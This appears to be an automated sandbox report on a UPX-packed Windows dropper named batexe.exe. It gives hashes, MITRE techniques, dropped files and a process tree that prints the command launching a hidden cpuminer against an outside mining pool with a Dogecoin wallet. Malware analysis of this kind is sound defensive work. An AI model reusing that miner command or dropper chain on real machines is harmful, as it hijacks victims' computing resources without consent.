73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
296s
max time network
304s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
18-02-2024 09:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
1940	b2e.exe
2144	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2144	cpuminer-sse2.exe
2144	cpuminer-sse2.exe
2144	cpuminer-sse2.exe
2144	cpuminer-sse2.exe
2144	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4808-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4808 wrote to memory of 1940	4808	batexe.exe	84
PID 4808 wrote to memory of 1940	4808	batexe.exe	84
PID 4808 wrote to memory of 1940	4808	batexe.exe	84
PID 1940 wrote to memory of 4940	1940	b2e.exe	85
PID 1940 wrote to memory of 4940	1940	b2e.exe	85
PID 1940 wrote to memory of 4940	1940	b2e.exe	85
PID 4940 wrote to memory of 2144	4940	cmd.exe	88
PID 4940 wrote to memory of 2144	4940	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4808
- C:\Users\Admin\AppData\Local\Temp\8AFA.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\8AFA.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8AFA.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1940
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\91E0.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4940
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2144

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\8AFA.tmp\b2e.exe

Filesize
2.3MB

MD5
cb0cb4d897bac745015b847c88b68d4c

SHA1
7672cefcd29e3f40b2a8194585b15726eef1f805

SHA256
ca85c573d0d64588a21ea16aa6408c7213a08de663a2cfd24025af32d2b195e5

SHA512
c0e9f0c171c6f7014318b47f753a453283fb83862979b7c981075867834cf0ddb75882a0dbe80809d369412a6a7ad60ebf4d4f8521661f18720a0dc5f4a098cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\8AFA.tmp\b2e.exe

Filesize
2.6MB

MD5
eb06db1e47c36b18d6620758c1c581ca

SHA1
51c61b7a5e660a138785ee9dc1506e26a0ba1b91

SHA256
9c6a8641cbfa79037abe030bdc6f4c854194d12941c0050d1743b7c84f7c4019

SHA512
c2f67f55e09a0570962e4760b2020adbd85775ab9c551f823da39d363babec41e5df535c40cc39b0fe83b14b843fdfd0b4ec2b815844ddeb27fd4e61402c7496

Download Submit
C:\Users\Admin\AppData\Local\Temp\8AFA.tmp\b2e.exe

Filesize
3.0MB

MD5
1f163d5c2f738d98e0e496f099a90d7c

SHA1
b96f9da128ffaed40a4b458c8078ed9f538f3cfe

SHA256
2d738a66daf066a4ea471561e899f780c8e80cb1fe0936dd8ecab050ac2ff91c

SHA512
6c952bc68bdb6c2a81d3cf4c0e16258c9f55cc5157bd8a23c206bc4c90529bcfbc665d1ad274e002c642fb618c7f07754761d2e3f10d1bb96e82b7560e950062

Download Submit
C:\Users\Admin\AppData\Local\Temp\91E0.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
492KB

MD5
99f62c6da8b5c72b6631891a77d57b88

SHA1
ba04a3f8a2309020f7fc79a1909ca26256a86279

SHA256
c40f393d59ed1798355eab8a67244853bed121d6d44256cb90afbe3235b057d6

SHA512
3f1b7cb03a3c1faaf63118c0c5fe8b111e7a8d93c593edd7a4e07166d08e62bf83b2faaed07adc42e6e2c2715d4ef01a8789fba2debf63c5594b904c13159831

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
705KB

MD5
b42b16d7601f16b59ac39b7d24a33460

SHA1
22c25079ce48c6caf14fdded03b3a74560300b4b

SHA256
0de9a81dee443ed7d6b3b11b67da01fb9d971ce07a4bd421ceb22567002368ce

SHA512
3b4ddf00497e65688a0b7f6b469f7f53981bb7b432e7cbed46436e7d7b67ee8af395a381168e0957e49c288fef787616f609155a8ed78f1eb61c17a81b8c5a93

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
613KB

MD5
f6b14a51a55e94b7a401c3dae1219a26

SHA1
464b5ca2fb27b6c5feef5de847412084eb83101f

SHA256
c5dde66366f5ead0d889946aef4ef92abf2d0d5cf97d3720b48947436a5d0bfd

SHA512
d221c7044ff6bfe30feb78d90aa12478717b21055882ceac15c38ed6ec5cf29f25c8abe56568c5e1cce06e43120b9915e3124f27ffd3ba2e27c7037772d41427

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
489KB

MD5
4febb4cf905a2955e30a4f0fb0d998a7

SHA1
9b4e8499f2dc4ac71ac67e780d8be44b0f1d4b92

SHA256
9c0b33a09174d32db53d0c8226ab2420109f721d0d823d555f3ada14b773e79a

SHA512
f2bb1ae7cc6bb366689f647342bc32179e6bf7f4fdf57c656d9a870fd7a41ab089478487aa663774aa20410b0e9898a13becc07ca501d1229b545b63ab33634d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
600KB

MD5
69d1c0a2317099fde5660ce7c8f86cf8

SHA1
486a225eef7b4de89787b25d2bb64d9f9f0639f4

SHA256
351b7bc30bc77268d7879e94e88c0afdce5703213030522509da17b507b12ddb

SHA512
c741e444c3b13feedc204db6967b92094b0459c25238ed1452185003ae8a2314975f539c56fb2a6285124dce0460de66fea3a1f226f3df5666ff7985af8c4e19

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
674KB

MD5
5af560a06926bca98df46c69b1e86ea7

SHA1
659661f30e64f25fc388ccb22b7c461dbbcd8baa

SHA256
34c369af2cac1d14e4c8d9aed9faebbeb4214f51d1fb2d0c8b3f3d4dad182209

SHA512
b8809647cbc203a671403ac21cf42915696d5ca99664e931c2f828a9cfdd21f8e766cd66e27b6a1290cec3da86cc47adeadd9ec026471ea28a11c6fcc729b99a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
468KB

MD5
8959ff78743504cb5fa7843993f4aae1

SHA1
38cd95283ce539543597f280ddeb3e37ecb450d5

SHA256
8f3851077c14a424a19a640407a8ba09ae572898886f5a7ab998cc8895c5f3b7

SHA512
9c77eb3017ebde8b9fa86adfbb309d6ada417d724a095c83c516ad156ca95ef2261f03b520bb40c2608cfcc87a3100d31ffc4bb01dfed9062fb1e448ba85d95f

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
367KB

MD5
6fcf9f913f80a358b50bc85760f8ce3c

SHA1
99a60547b9b34929d5ebe228bdaf01e69f1d59d5

SHA256
bfe23fa66382023d9b9d5b8e08dff3efd8d1bf67ba16ee3202a0322906f1f086

SHA512
59ff00844a6a8b495436a256eddb6614da62bc4824f6a29f5c5724c999de6ca68780096e5667f22d0d23fafae41e4e626a83e0879954a3d4d03b84e6660276e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
325KB

MD5
464e213b2c6092a9cb97799e7bd04f07

SHA1
3b6b9951f0f94c62a5ca3bd7b633b7b0835fca6a

SHA256
e729c275b5acf8e6bea39bdf879ae85d87ea85cf129309d84755bc737e73cd20

SHA512
6f9cc95fe3487b429c24496d364f7960292a0026de217c21358583c90d7172fd9abf7f9f2eb170a06456d323fa160857d3274b1b19da8bc5698a2000bb842cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
560KB

MD5
0cfc124e1a9aaf59bc6579e2925d7ce0

SHA1
fe09d4cf4bb03d5fa5500bbc8d2e67dff6c78a97

SHA256
1c94fe0eef4d0d9f822a769681f9fc53bd52a87e6cba6b42377e93de78715f40

SHA512
027c9f23a43775d5dd8deacf4efccde90cad39713819fcb2cdd0a3920a105d7d09ca3212470e299f84626395b44ae41ca5296bb034aaffc436c3515a2ce924ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1940-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/1940-7-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/2144-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2144-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2144-46-0x0000000070B60000-0x0000000070BF8000-memory.dmp

Filesize
608KB

Download
memory/2144-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2144-47-0x0000000000F40000-0x00000000027F5000-memory.dmp

Filesize
24.7MB

Download
memory/2144-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2144-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2144-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2144-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2144-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2144-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2144-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2144-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2144-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2144-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2144-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2144-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4808-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download